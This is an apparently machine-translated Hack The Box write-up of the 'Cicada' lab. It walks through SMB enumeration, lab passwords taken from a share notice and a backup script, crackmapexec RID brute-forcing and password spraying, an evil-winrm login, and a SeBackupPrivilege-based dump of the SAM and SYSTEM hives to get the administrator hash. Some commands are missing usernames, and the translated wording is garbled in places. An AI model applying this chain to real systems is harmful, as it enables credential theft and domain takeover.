Location>code7788 >text

HTB Target Shooting Record - Cicada

Popularity:971 ℃/2024-10-14 19:06:11

Nmap Scan

nmap scan the ip.

nmap -sT -sV -O -Pn 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.012s latency).
Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp?
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
110/tcp open  pop3?
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running: Microsoft Windows XP|7|2012, VMware Player
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.91 seconds

smb test

Open port 445, smbclient will connect.

smbclient -L //10.10.11.35

Sign in confidentially to check out the HR folder

<font style="color:rgb(18, 18, 18);">smbclient -N //10.10.11.35/HR</font>

will"Notice from "Download it.

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Get a password:Cicada$M6Corpb*@Lp#nZp!8

Rid Blast

Detect the presence of a username by using the default account guest blastrid, here filtering for the user

crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"





Blast the users.

crackmapexec smb 10.10.11.35 -u -p 'Cicada$M6Corpb*@Lp#nZp!8'

Get user password.:Cicada$M6Corpb*@Lp#nZp!8

enum4linux-ng scanning

Use enum4linux-ng to gather all information related to the smb service

enum4linux-ng -A -u -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

Get user password.:aRt$Lp#7t*VQ!3

Connecting the DEV folder

smbclient //10.10.11.35/DEV -U ''

downloadingBackup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = ""
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object ($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

User password.:Q!3@Lp#M6b*7t*Vt

Winrm Login

evil-winrm -u -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

whoami /allFound out it's on.SeBackupPrivilegebe part ofBackup Operatorsgroup, indicating that you can export files from the registry, in the temp directory to export the sam file (stuck as a son)

reg save hklm\sam 
reg save hklm\system 


download 
download 

I've been stuck for half a day without getting it down. Anyway, get it down, decrypt it to get the administrator's hash, then use evil-winrm to log in to get it.